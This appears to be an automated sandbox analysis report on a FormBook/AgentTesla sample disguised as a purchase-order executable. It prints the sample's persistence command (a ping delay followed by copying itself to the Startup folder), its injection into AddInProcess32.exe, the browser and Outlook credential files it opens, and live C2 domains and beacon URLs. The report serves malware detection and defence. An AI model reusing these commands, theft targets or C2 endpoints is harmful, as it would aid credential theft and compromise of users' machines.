                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: C66008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A6D008Jump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "C:\Users\user\Desktop\PO# 81136575.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe" Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
                Source: C:\Windows\SysWOW64\clip.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess created: C:\Users\user\AppData\Local\Temp\sages.exe "C:\Users\user\AppData\Local\Temp\sages.exe"
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "c:\users\user\desktop\po# 81136575.exe" "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\sage.exe"
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 49 > nul && copy "c:\users\user\desktop\po# 81136575.exe" "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\sage.exe" && ping 127.0.0.1 -n 49 > nul && "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\sage.exe"Jump to behavior
                Source: RAVCpl64.exe, 00000017.00000002.5957430978.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000017.00000000.2663140410.0000000000E20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: RAVCpl64.exe, 00000017.00000002.5957430978.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000017.00000000.2663140410.0000000000E20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: RAVCpl64.exe, 00000017.00000002.5957430978.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000017.00000000.2663140410.0000000000E20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RAVCpl64.exe, 00000017.00000002.5957430978.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000017.00000000.2663140410.0000000000E20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\PO# 81136575.exeQueries volume information: C:\Users\user\Desktop\PO# 81136575.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sages.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sages.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\sages.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\sages.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sages.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\sages.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\sages.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sages.exe VolumeInformation
                Source: C:\Users\user\Desktop\PO# 81136575.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure1
                Valid Accounts                		1
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		3
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Valid Accounts                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		LSASS Memory113
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt12
                Registry Run Keys / Startup Folder                		1
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		Security Account Manager331
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Access Token Manipulation                		4
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
                Process Injection                		12
                Software Packing                		LSA Secrets151
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                Registry Run Keys / Startup Folder                		1
                Timestomp                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSync1
                Remote System Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Masquerading                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Valid Accounts                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Access Token Manipulation                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd151
                Virtualization/Sandbox Evasion                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task612
                Process Injection                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                Hidden Files and Directories                		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564715 Sample: PO# 81136575.exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 65 www.gfdgdfery.xyz 2->65 67 www.tyai36.top 2->67 69 19 other IPs or domains 2->69 97 Suricata IDS alerts for network traffic 2->97 99 Malicious sample detected (through community Yara rule) 2->99 101 Antivirus detection for URL or domain 2->101 105 11 other signatures 2->105 10 sage.exe 5 2->10         started        15 PO# 81136575.exe 5 2->15         started        signatures3 103 Performs DNS queries to domains with low reputation 65->103 process4 dnsIp5 73 www.hubeisuizhou.net 43.153.84.190, 49720, 49721, 49722 LILLY-ASUS Japan 10->73 75 www.bashei.top 23.225.34.75, 49724, 49725, 49726 CNSERVERSUS United States 10->75 77 2 other IPs or domains 10->77 61 C:\Users\user\AppData\Local\Temp\sages.exe, PE32 10->61 dropped 119 Writes to foreign memory regions 10->119 121 Allocates memory in foreign processes 10->121 123 Hides that the sample has been downloaded from the Internet (zone.identifier) 10->123 125 Injects a PE file into a foreign processes 10->125 17 AddInProcess32.exe 10->17         started        20 sages.exe 2 10->20         started        22 AddInProcess32.exe 10->22         started        24 AddInProcess32.exe 10->24         started        63 C:\Users\user\...\PO# 81136575.exe.log, ASCII 15->63 dropped 26 cmd.exe 3 15->26         started        file6 signatures7 process8 file9 79 Modifies the context of a thread in another process (thread injection) 17->79 81 Maps a DLL or memory area into another process 17->81 83 Queues an APC in another process (thread injection) 17->83 95 2 other signatures 17->95 29 RAVCpl64.exe 17->29 injected 85 Antivirus detection for dropped file 20->85 87 Multi AV Scanner detection for dropped file 20->87 32 sages.exe 20->32         started        57 C:\Users\user\AppData\Roaming\...\sage.exe, PE32 26->57 dropped 59 C:\Users\user\...\sage.exe:Zone.Identifier, ASCII 26->59 dropped 89 Uses ping.exe to sleep 26->89 91 Drops PE files to the startup folder 26->91 93 Uses ping.exe to check the status of other devices and networks 26->93 34 sage.exe 3 26->34         started        36 PING.EXE 1 26->36         started        39 conhost.exe 26->39         started        41 PING.EXE 1 26->41         started        signatures10 process11 dnsIp12 127 Maps a DLL or memory area into another process 29->127 129 Found direct / indirect Syscall (likely to bypass EDR) 29->129 43 clip.exe 29->43         started        131 Writes to foreign memory regions 34->131 133 Allocates memory in foreign processes 34->133 135 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->135 137 Injects a PE file into a foreign processes 34->137 46 sages.exe 34->46         started        48 AddInProcess32.exe 34->48         started        50 AddInProcess32.exe 34->50         started        71 127.0.0.1 unknown unknown 36->71 signatures13 process14 signatures15 109 Tries to steal Mail credentials (via file / registry access) 43->109 111 Tries to harvest and steal browser information (history, passwords, etc) 43->111 113 Modifies the context of a thread in another process (thread injection) 43->113 115 Maps a DLL or memory area into another process 43->115 52 firefox.exe 43->52         started        117 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 46->117 54 sages.exe 46->54         started        process16 signatures17 107 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 54->107

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO# 81136575.exe100%AviraTR/AVI.Agent.lusxc
                PO# 81136575.exe74%ReversingLabsWin32.Trojan.AgentTesla
                PO# 81136575.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe100%AviraTR/AVI.Agent.lusxc
                C:\Users\user\AppData\Local\Temp\sages.exe100%AviraTR/Agent.able
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\sages.exe83%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe74%ReversingLabsWin32.Trojan.AgentTesla

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.slwmarketing.online/Internet_Search_Engines.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM60%Avira URL Cloudsafe
                http://www.slwmarketing.online/Small_Business_Financing.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM0%Avira URL Cloudsafe
                http://www.bashei.top/wh2p/0%Avira URL Cloudsafe
                https://dts.gnpge.com0%Avira URL Cloudsafe
                http://www.bashei.top/wh2p/?VX=9+zt0j5vH1hwmuNu9M8ocWXwdarV/CDICdzwuxwNfU8HGUfYBmRRDoptJYgisjO2VNRkebPIiKpJv3rqkJwKZD01RYDx7edSJaNyhcvFUUhy7aDPpqjYjT4=&YDrhw=DvQP9LC050182Z30%Avira URL Cloudsafe
                http://purl.oen0%Avira URL Cloudsafe
                http://www.hubeisuizhou.net/jywy/0%Avira URL Cloudsafe
                http://www.1win-moldovia.fun/rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk=0%Avira URL Cloudsafe
                http://purl.oenS50%Avira URL Cloudsafe
                https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html0%Avira URL Cloudsafe
                http://www.slwmarketing.online/__media__/design/underconstructionnotice.php?d=slwmarketing.online0%Avira URL Cloudsafe
                http://www.homebizsuccess.blog100%Avira URL Cloudmalware
                http://homebizsuccess.blog/sn35/?VX=2Ljw85fE62irHv4CO6sOxtyqmKbvzO49yiJy4Znj95Je100%Avira URL Cloudmalware
                http://purl.oen=90%Avira URL Cloudsafe
                http://www.Slwmarketing.online0%Avira URL Cloudsafe
                http://www.slwmarketing.online/Trade.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wciee8E0%Avira URL Cloudsafe
                https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html0%Avira URL Cloudsafe
                http://www.slwmarketing.online/Marketing_Online_Strategy.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tY0%Avira URL Cloudsafe
                https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a9.html0%Avira URL Cloudsafe
                http://beta.visualstudio.net/net/sdk/feedback.asp0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=akravchenko.dev0%Avira URL Cloudsafe
                http://www.slwmarketing.online/Exchange.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wcie0%Avira URL Cloudsafe
                http://www.akravchenko.dev/l1qb/0%Avira URL Cloudsafe
                https://www.gandi.net/en/domain0%Avira URL Cloudsafe
                https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.html0%Avira URL Cloudsafe
                http://www.homebizsuccess.blog/sn35/100%Avira URL Cloudmalware
                http://go.microsoft.c0%Avira URL Cloudsafe
                https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html0%Avira URL Cloudsafe
                https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html0%Avira URL Cloudsafe
                http://www.hubeisuizhou.net/jywy/?YDrhw=DvQP9LC050182Z3&VX=eSCeWRIoJNy1ChkNr9Mrph+bw9krj2HtA4M0Ycvj+4uTwHyRXe49PM8qrTbeBTFYTaFawzZELf0uMSg9ynQv9wCKXjtU0s3V3zZMSDWRvxGcx4r7U6700ik=0%Avira URL Cloudsafe
                http://www.slwmarketing.online/__media__/js/trademark.php?d=slwmarketing.online&type=ns0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                webredir.vip.gandi.net
                		217.70.184.50
                		truefalse
                  		high
                  tyai36.top
                  		38.47.207.120
                  		truetrue
                    		unknown
                    www.hubeisuizhou.net
                    		43.153.84.190
                    		truetrue
                      		unknown
                      homebizsuccess.blog
                      		192.185.16.209
                      		truetrue
                        		unknown
                        www.bashei.top
                        		23.225.34.75
                        		truetrue
                          		unknown
                          claudpinheiro.online
                          		84.32.84.32
                          		truetrue
                            		unknown
                            www.gfdgdfery.xyz
                            		104.21.53.93
                            		truetrue
                              		unknown
                              www.shedoes.top
                              		162.0.239.141
                              		truefalse
                                		unknown
                                www.1win-moldovia.fun
                                		172.67.149.53
                                		truetrue
                                  		unknown
                                  www.healthsolutions.top
                                  		13.248.169.48
                                  		truetrue
                                    		unknown
                                    redirect.3dns.box
                                    		172.172.168.240
                                    		truetrue
                                      		unknown
                                      www.56435.net
                                      		172.247.159.68
                                      		truetrue
                                        		unknown
                                        www.affilamark.buzz
                                        		161.97.168.245
                                        		truetrue
                                          		unknown
                                          www.slwmarketing.online
                                          		208.91.197.27
                                          		truetrue
                                            		unknown
                                            www.tekilla.wtf
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.homebizsuccess.blog
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.akravchenko.dev
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.claudpinheiro.online
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.tyai36.top
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.aflaksokna.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.torkstallningar.shop
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.bashei.top/wh2p/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bashei.top/wh2p/?VX=9+zt0j5vH1hwmuNu9M8ocWXwdarV/CDICdzwuxwNfU8HGUfYBmRRDoptJYgisjO2VNRkebPIiKpJv3rqkJwKZD01RYDx7edSJaNyhcvFUUhy7aDPpqjYjT4=&YDrhw=DvQP9LC050182Z3true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.1win-moldovia.fun/rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hubeisuizhou.net/jywy/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.akravchenko.dev/l1qb/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hubeisuizhou.net/jywy/?YDrhw=DvQP9LC050182Z3&VX=eSCeWRIoJNy1ChkNr9Mrph+bw9krj2HtA4M0Ycvj+4uTwHyRXe49PM8qrTbeBTFYTaFawzZELf0uMSg9ynQv9wCKXjtU0s3V3zZMSDWRvxGcx4r7U6700ik=true
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabclip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchclip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://dts.gnpge.comclip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/ac/?q=clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.htmlclip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cdn.consentmanager.netsage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.slwmarketing.online/Internet_Search_Engines.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://purl.oenS5sage.exe, 0000000E.00000002.6012035049.00000000058E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
